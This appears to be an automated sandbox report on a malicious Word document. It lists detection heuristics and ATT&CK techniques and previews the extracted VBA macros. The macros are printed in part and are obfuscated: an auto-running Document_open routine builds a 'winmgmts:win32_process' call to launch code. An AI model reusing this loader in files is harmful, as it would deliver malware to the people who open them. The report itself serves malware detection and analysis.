MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and configured to execute obfuscated VBA code. This code likely attempts to download and execute a second-stage payload, a common technique for malware delivery. The presence of VBA macros and the auto-execution of code via Document_Open strongly suggest a spearphishing attachment attack vector.
Heuristics 6
-
ClamAV: Doc.Malware.Generic-7546200-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-7546200-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8277 bytes |
SHA-256: 8d1972f99526095b3a55bd672660629ff7455da915bcd736e510b77e56712c1c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Efferdrq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Kkapcimmcib
End Sub
Attribute VB_Name = "Liyhzkoypfma"
Attribute VB_Base = "0{9EAF311C-2718-452D-A0C8-FA5FE42E91CD}{A1B926CD-2F01-4610-AAFB-2667E6E9D565}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mojacpyniebzf"
Function Uizzoslddbphd()
Select Case Utpetecknx
Case Dqoulumteo
Hnldhwcv = 7
Earvwczdeeqc = Atn(4)
Gpnnwrhghlwfs = Sin(Rvevmloc)
Case Kubkhmfplwrjo
Kxsgyrjaznjmg = Log(3)
Snxpmxfwayr = 6
Cmhgfxbnv = CSng(Gatbwxzydxed)
Case Maebshhbcynfc
Kzwrfilddz = ChrW(Tljxiuisxwmdo)
Yvorvrpty = 1
Gqawbbpjop = Cos(Ekuplnmt)
End Select
Xkitwdsxnv = ChrW(wdKeyP)
Select Case Jckyesnkijkyg
Case Qbyjlijtt
Zhiawowjdcsh = 7
Ypteshxldc = Atn(4)
Cgpajqbk = Sin(Bhnwcxxey)
Case Amtppapwnegwt
Tdtbfopsnlq = Log(3)
Aozdkebtw = 6
Qlofbvltjmdt = CSng(Nklufeyekwzec)
Case Lwxtzkuakqs
Mswuofwtqzqgv = ChrW(Sfwszeyq)
Lmtkadne = 1
Szfqwpvuwgmd = Cos(Hftzasncqudt)
End Select
Xrpnoikzydum = Xkitwdsxnv + Liyhzkoypfma.Ascdvumitfenw + Liyhzkoypfma.Eoztejoiiemfn
Select Case Roqxknavfs
Case Zlhkqolyoqfq
Smkrudxukr = 7
Elkunrkcslp = Atn(4)
Irzvaiad = Sin(Okoyaueapgbj)
Case Ucofqthxwpl
Zjiekgqvjzski = Log(3)
Zhzzqkayuu = 6
Nqnymnwfq = CSng(Rckskcvv)
Case Wxpqmwnyl
Xcdewbfwmh = ChrW(Eixgrqvzyeyr)
Iarihfsttzgno = 1
Zwybdlhppvi = Cos(Ktellxtfeda)
End Select
losd = Liyhzkoypfma.Ofrxmena.GroupName
Tfnnlhmaf = Split(Xrpnoikzydum + LTrim(losd), "//====dsfnnJJJsm388//=")
Select Case Wpqzhgpqtcwne
Case Pmqwkehw
Hwjaqujgxgzl = 7
Ewjkmfpireez = Atn(4)
Ivotofajfqdhn = Sin(Qedhwroux)
Case Eyffvqpnycrfx
Vqthfribazas = Log(3)
Ubrjqbbd = 6
Mraieyzghdwx = CSng(Egvxffvxhid)
Case Whysrpzvnqaxc
Lfhwacfjgeyu = ChrW(Krecydzjkfi)
Rpuzcebmcbha = 1
Xrotuzgdywu = Cos(Ubucozhoulevq)
End Select
Uizzoslddbphd = Tnakagfgnfgdi + Join(Tfnnlhmaf, "") + Tnakagfgnfgdi
Select Case Irdwcaskbv
Case Vqvrrbtykbs
Itolzndppj = 7
Nhyscmmruwtev = Atn(4)
Uczgzgmtheyc = Sin(Zfhiueuuf)
Case Gfpmzkqutim
Mqanrodk = Log(3)
Uqmvaazaxr = 6
Bwhhuihpwnpe = CSng(Dgdreectu)
Case Ppttipyktpe
Uucophahyw = ChrW(Xgnnqhcmteto)
Yrucpzztwjb = 1
Nugqswbl = Cos(Xdhbuppbos)
End Select
End Function
Function Kkapcimmcib()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Liyhzkoypfma.Bnsaodxiii + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Upumvpzkxekc
Case Irybjkbwl
Gxnovzcxggkb = 7
Ecgavqkz = Atn(4)
Ghbbutyeyr = Sin(Mvbeieuzxqmy)
Case Uvqfkgbbi
Acnhgcunmpkzq = Log(3)
Ewopucvmy = 6
Shjqlnmfhbh = CSng(Nsktskwzwdb)
Case Stvfqoeskm
Ewmkbexdxbcrc = ChrW(Govdhlyutkb)
Nxdfgxnnkouz = 1
Orrddvax = Cos(Jwkfctazsep)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Uopbqqll
Case Tteplijtsfojw
Ircanjhaz = 7
Qikkhncfsm = Atn
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.